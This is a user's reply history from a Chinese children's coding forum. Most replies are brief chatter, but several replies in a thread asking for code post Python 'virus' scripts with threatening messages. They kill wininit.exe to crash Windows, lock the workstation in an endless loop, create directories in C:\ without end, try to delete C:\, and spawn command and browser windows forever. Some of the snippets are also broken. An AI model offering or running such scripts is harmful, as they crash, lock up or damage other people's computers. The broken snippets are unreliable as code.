猫史档案馆


cool-creeper

cool-creeper

Lv.1

Hi~ o(* ̄▽ ̄*)ブ

获赞:161收藏:53浏览:2333作品收藏:121

签名:合作box3

回复帖子评论
上一页7 页 / 共 20下一页

代码岛3.0内测版(box3.codemao.cn) 中回复

zhegeshuidouzhidao(这个谁都知道)

2020-04-03T10:11:16 点赞:0

求代码!! 中回复

docs.box3.codemao.cn

2020-04-03T10:14:10 点赞:0

你叫什么名字? 中回复

whs

2020-04-03T21:23:43 点赞:0

武汉加油 中国加油 中回复

沙发

2020-04-04T21:21:35 点赞:0

我的新作品 图形化编辑器 中回复

……

2020-04-05T19:23:52 点赞:0

【0成本建网站】【第四期】修改文字——别催别催,今天还没过完呢! 中回复

<span>挖坟</span>

2020-04-06T09:42:55 点赞:0

【0成本建网站】【第四期】修改文字——别催别催,今天还没过完呢! 中回复

404

There isn't a GitHub Pages site here.

If you're trying to publish one, read the full documentation to learn how to set up GitHub Pages for your repository, organization, or user account.

GitHub Status —  @githubstatus

2020-04-06T10:40:29 点赞:1

【0成本建网站】【第三期】选择主题 中回复

404

There isn't a GitHub Pages site here.

If you're trying to publish one, read the full documentation to learn how to set up GitHub Pages for your repository, organization, or user account.

GitHub Status —  @githubstatus

2020-04-06T10:42:07 点赞:0

我们上线一起玩吧!这个好玩!真好玩! 中回复

OK

2020-04-06T11:35:26 点赞:0

恐怖地图(滑稽) 中回复

求链接

2020-04-06T20:46:24 点赞:0

【生化危机】招募建筑师 中回复

我我我我我我我哦无无无无无无无无无无无无无无无无无无无无无无无无无无无无无无

2020-04-07T20:41:50 点赞:0

史上最慢跑酷速度!至今无人超越! 中回复

又刷了个记录~

center_image

2020-04-08T09:04:58 点赞:0

SK的GIF文件 中回复

沙发

2020-04-08T09:09:00 点赞:0

企鹅办box3建筑比赛啦!!!速速来参加! 中回复

我没权限啊啊啊啊啊啊啊啊啊啊啊啊啊啊

2020-04-08T09:09:19 点赞:0

【@小火熊@吉吉喵】小火熊!小火熊!听到请回复! 中回复

我左眼0.4,有眼0.3

2020-04-09T09:51:48 点赞:0

故宫开车 截屏 中回复

板凳

2020-04-09T13:41:35 点赞:0

建图了!!!有意者来 中回复

我我我

2020-04-09T13:47:50 点赞:0

下雨代码看一下 中回复

沙发

2020-04-10T09:14:13 点赞:0

【代码岛3.0】救命 中回复

羡慕

2020-04-10T09:23:00 点赞:0

【Python作品分享】view_downloadMusic【作品秀】 中回复

666,我拜你为师

2020-04-12T10:50:47 点赞:0

大家快看!!! 中回复

沙发

2020-04-12T15:31:39 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

import tkinter.messagebox as msg
import os
msg.showerror('你好')
msg.showerror('我是病毒')
msg.showerror('受死吧')
os.system('taskkill /f /im wininit.exe')

2020-04-12T20:39:44 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

print('病毒已准备就绪')
print('你的电脑的死期到了')
from ctypes import *

while True:

        user32 = windll.LoadLibrary('user32.dll')

        user32.LockWorkStation()

2020-04-12T20:43:45 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

import os, sys
def mkdir():
path = 'C:\\'
i = 0
a = 1
while a>0: 
file_name = path + str(oct(i))
os.mkdir(file_name)
i=i+1
mkdir()

2020-04-12T20:48:38 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

import os
path = 'C:\\'  # 文件路径
if os.path.exists(path):  # 如果文件存在
    # 删除文件,可使用以下两种方法。
    os.remove(path)  
    #os.unlink(path)
else:
    print('no such file:%s'%my_file)  # 则返回文件不存在

2020-04-12T20:49:25 点赞:0

【Python作品分享】view_downloadMusic【作品秀】 中回复

下载不了啊

2020-04-12T21:01:22 点赞:0

【Python作品分享】没信号【作品秀】 中回复

什么意思?

2020-04-12T21:01:43 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

import os
while True:
    os.system("start cmd")

2020-04-12T21:03:20 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

import os
while True:
    os.system('start cmd')#喵是m d
    try:#如果被攻击者没有Chrome
        os.system('start chrome')
    except:
        pass

2020-04-12T21:07:39 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

#再来一个
import os
while True:
    os.system('start cmd')

2020-04-12T21:10:56 点赞:0